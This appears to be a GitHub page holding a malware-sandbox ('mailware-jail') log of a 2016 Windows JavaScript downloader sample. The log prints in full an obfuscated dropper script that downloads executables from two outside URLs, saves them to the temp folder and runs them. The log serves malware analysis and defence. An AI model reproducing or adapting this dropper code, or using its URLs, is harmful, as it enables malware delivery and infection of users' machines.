-
Notifications
You must be signed in to change notification settings - Fork 97
/
Copy path802577e503bd1880e57b3bd3d3ed047d90a0f0aa0dee89a04a90944fc1f74f27.out
131 lines (131 loc) · 7.22 KB
/
802577e503bd1880e57b3bd3d3ed047d90a0f0aa0dee89a04a90944fc1f74f27.out
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
13 Oct 23:47:06 - mailware-jail, a malware sandbox ver. 0.8
13 Oct 23:47:06 - ------------------------
13 Oct 23:47:06 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js,env/console.js
13 Oct 23:47:06 - Malware files: malware/20161013/802577e503bd1880e57b3bd3d3ed047d90a0f0aa0dee89a04a90944fc1f74f27.js
13 Oct 23:47:06 - Output file for sandbox dump: sandbox_dump_after.json
13 Oct 23:47:06 - Output directory for generated files: output/
13 Oct 23:47:06 - ==> Preparing Sandbox environment.
13 Oct 23:47:06 - => Executing: env/utils.js
13 Oct 23:47:06 - => Executing: env/eval.js
13 Oct 23:47:06 - Preparing sandbox to intercept eval() calls.
13 Oct 23:47:06 - => Executing: env/function.js
13 Oct 23:47:06 - Preparing sandbox to intercept 'new Function()' calls.
13 Oct 23:47:06 - => Executing: env/wscript.js
13 Oct 23:47:06 - Preparing sandbox to emulate WScript environment.
13 Oct 23:47:06 - => Executing: env/browser.js
13 Oct 23:47:06 - Preparing sandbox to emulate Browser environment (default = IE11).
13 Oct 23:47:06 - Created: window[1]
13 Oct 23:47:06 - Created: document[2]
13 Oct 23:47:06 - document[2].createElement(html)
13 Oct 23:47:06 - Element[3] created, named: 'html'
13 Oct 23:47:06 - document[2].createElement(body)
13 Oct 23:47:06 - Element[5] created, named: 'body'
13 Oct 23:47:06 - document[2].body = 'Element[5]'
13 Oct 23:47:06 - document[2].createElement(head)
13 Oct 23:47:06 - Element[7] created, named: 'head'
13 Oct 23:47:06 - Element[3].appendChild(Element[7])
13 Oct 23:47:06 - Element[3].firstChild set
13 Oct 23:47:06 - document[2].body.get() => Element[5]
13 Oct 23:47:06 - Element[3].appendChild(Element[5])
13 Oct 23:47:06 - => Executing: env/agents.js
13 Oct 23:47:06 - Setting Browser environment to: IE8 on Win10 64bit
13 Oct 23:47:06 - window[1].userAgent.get() => Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; WOW64; Trident/7.0; Touch; .NET4.0C; .NET4.0E; . ... (truncated)
13 Oct 23:47:06 - => Executing: env/other.js
13 Oct 23:47:06 - => Executing: env/console.js
13 Oct 23:47:06 - ==> Executing malware file(s).
13 Oct 23:47:06 - => Executing: malware/20161013/802577e503bd1880e57b3bd3d3ed047d90a0f0aa0dee89a04a90944fc1f74f27.js
13 Oct 23:47:06 - WScript.Sleep(500)
13 Oct 23:47:06 - WScript.Sleep(500)
13 Oct 23:47:07 - WScript.Sleep(500)
13 Oct 23:47:07 - WScript.Sleep(500)
13 Oct 23:47:08 - WScript.Sleep(500)
13 Oct 23:47:08 - WScript.Sleep(500)
13 Oct 23:47:09 - WScript.Sleep(500)
13 Oct 23:47:09 - WScript.Sleep(500)
13 Oct 23:47:10 - WScript.Sleep(500)
13 Oct 23:47:10 - WScript.Sleep(500)
13 Oct 23:47:11 - WScript.Sleep(500)
13 Oct 23:47:11 - WScript.Sleep(500)
13 Oct 23:47:12 - WScript.Sleep(500)
13 Oct 23:47:12 - WScript.Sleep(500)
13 Oct 23:47:13 - WScript.CreateObject(WScript.Shell)
13 Oct 23:47:13 - Created: WScript.Shell[9]
13 Oct 23:47:13 - ActiveXObject(Scripting.FileSystemObject)
13 Oct 23:47:13 - Scripting.FileSystemObject[10] created.
13 Oct 23:47:13 - WScript.Shell[9].ExpandEnvironmentStrings(%TMP%)
13 Oct 23:47:13 - Scripting.FileSystemObject[10].OpenTextFile(%TMP%\XipXkrLd.js)
13 Oct 23:47:13 - TextStream[11] created.
13 Oct 23:47:13 - TextStream[11].Write("Thu Oct 13 2016 23:47:13 GMT+0200 (CEST)"
var SvjUKAc = new Date();
while(true) {
var XwHvxGz = new Date();
var ERupxfq = new Date(XwHvxGz.getTime() - SvjUKAc.getTime());
if(ERupxfq.getSeconds() > 5) {
break;
}
WScript.Sleep(500);
}
function ckCgnMtxxk(ibZdbdKp,CnWtQRBnxBRw) {nhjyEhX=0x1;ScLQeYp=0x0;ibZdbdKp.Run(CnWtQRBnxBRw, nhjyEhX, ScLQeYp);}
/*ToakIoXNFCHbmPvwLmfYFFdfZfhOyyKAhVBlGhbuYuaaPtQBjpqWMUQICukLkzPCPvwfXTyVLfMTKQFAbmUNmdXfyCGAptnxROKUHzooRKSGZhNsmcSyggxwOEwkOhfmmbrBLYyCrirmIspeQMjducrGyzFNHOrVaiscirbJkAkLKwkJOpUBbREKBnhjTpWxiiNxZDYJxM*/URjKuPKyMgrYr();
var mmcXR = ["http://lcbschool2.ac.th/pic/_notes/logs.php"];
var Wyiwp = ["http://masseriacarparelli.it/logs2.php"];
OsLAgfHCfdr(mmcXR, '23.exe');
OsLAgfHCfdr(Wyiwp, '24.exe');
function OsLAgfHCfdr(AUePbmz,xjshqCWtQ) {
var RIHh=407-407;
while(true) {
if(AUePbmz.length<=366-366) break;
var EOIT = xEnVXGW() % AUePbmz.length;
var KyRewCCEJ=AUePbmz[EOIT];
var BIxHp=xEnVXGW();
var TlJTxfwLxp=xjshqCWtQ;
var WDlUJfS=xjshqCWtQ;
var cvSRFkdY=112-111;
var LRACVIJdS = function(){
return new ActiveXObject(WDBmH('WS&WmSxvYpcV&cript&WmSxvYpcV&.She&l&l',[0,2,4,5,6],'&'));
}();
var WDlUJfS = ldNrVl(LRACVIJdS) + String.fromCharCode(92) + WDlUJfS;
var TbZdG = function(){
return new ActiveXObject(WDBmH('MSX&DiODGVvSB&ML2.XM&nmWtwgNOhvP&LHTTP',[0,2,4],'&'));
}();
UYCO(KyRewCCEJ,TbZdG);
if (TbZdG.status == 100+100) {
var sWPmhUM = function() {
return new ActiveXObject(WDBmH('ADO&DB&PGXbbEcUF&.&nEvdrVaCd&Stream',[0,1,3,5],'&'));
}();
var pDdQcrVkhARc=qSeGr(sWPmhUM,TbZdG.ResponseBody,WDlUJfS);
}
try {
ckCgnMtxxk(LRACVIJdS,WDlUJfS);
var xtIxXmh = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \''+TlJTxfwLxp+'\'');
if ( xtIxXmh.Count >= 1 ){break;}
} catch(e) {}
RIHh++;
MBGwN.splice (EOIT,327-326);
}
}
function ldNrVl(ByNmjV){var cxeVjMWm=["ExpandEnvironmentStrings"];return ByNmjV[cxeVjMWm[0]]('%TMP%')}
function qSeGr(fVDGQccj,Cmwwv,JCtZgNyuNT){try{fVDGQccj.open();mEvJHgAm(fVDGQccj);ShSvKwv(fVDGQccj,Cmwwv);EXncmYqiN(fVDGQccj);SAxs(fVDGQccj,JCtZgNyuNT);KlpoACZP=fVDGQccj.size;wcAPLEY(fVDGQccj);return KlpoACZP;}catch(e){}}
function UYCO(pEjdKZ,EZDobvT){try{bkIe = 'G*tqEiSfCEFO*E*T*sqkdtRMjxeQR'.split('*');EZDobvT.open(bkIe[0]+bkIe[2]+bkIe[3], pEjdKZ, false);EZDobvT.setRequestHeader("User-Agent", "Python-urllib/3.1");EZDobvT.send();}catch(e){}}
function WDBmH(mxhXCKNI,zTOiBb,woGPxsmnc){nymYF=mxhXCKNI.split(woGPxsmnc);VvdgKnq = 'isR';for(ltaWmxhr=0;ltaWmxhr<zTOiBb.length;ltaWmxhr++) {VvdgKnq+=nymYF[zTOiBb[ltaWmxhr]];}return VvdgKnq.substring(3,VvdgKnq.length);}
function URjKuPKyMgrYr() {/*BCKSGFxZTW().Sleep(5311-410);*/}
function YEPOLKB(){var NIZqdP=["random"];return Math[NIZqdP[0]]()}
function iPtA(EVWlhq) {EVWlhq.open();}
function mEvJHgAm(XPaMCcbtn) {XPaMCcbtn.type=1;}
function ShSvKwv(UBBO,aRAhF) {UBBO.write(aRAhF);}
function BCKSGFxZTW() {return/*XQRmBOFMbTPjQDAMKQpicfpILteYagMoPpTqwtDpMrwYdHDBnmBJHHxIfOUkXgZzcIpnLSVMQJxHJEZjjChdGcYCTcfpoaFEIVeetkGco*/WScript;}
function EXncmYqiN(hbpFEH) {var pOTTAMeVOw=[];hbpFEH.position=pOTTAMeVOw.length*(4714679-679);}
function SAxs(nTrxTKR,kQmMEIk) {nTrxTKR.saveToFile(kQmMEIk, 2);}
function wcAPLEY(NZHgp) {NZHgp.close();}
function xEnVXGW() {var AzTJ=99999+1;var vaVlYa = 100;return Math.round(YEPOLKB()*(AzTJ-vaVlYa)+vaVlYa);}
function QOawkeUO(iqwZo) {var maBHbxuS='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';for(var xfbbJ=0;xfbbJ<iqwZo;xfbbJ++){QvLxV+=maBHbxuS.charAt(Math.floor(Math.random()*maBHbxuS.length));}return QvLxV;}
function xfgtzigMYScAlH(XVdzyJUSJbBLjI) {return new ActiveXObject(XVdzyJUSJbBLjI);}
)
13 Oct 23:47:13 - TextStream[11].Close()
13 Oct 23:47:13 - WScript.Shell[9].ExpandEnvironmentStrings(%TMP%)
13 Oct 23:47:13 - WScript.Shell[9].Run(%TMP%\XipXkrLd.js, 1, 0)
13 Oct 23:47:13 - ==> Cleaning up sandbox.
13 Oct 23:47:13 - ==> Script execution finished, dumping sandbox environment to a file.
13 Oct 23:47:13 - Saving: output/_TMP__XipXkrLd.js
13 Oct 23:47:13 - Generated file saved
13 Oct 23:47:13 - The sandbox context has been saved to: sandbox_dump_after.json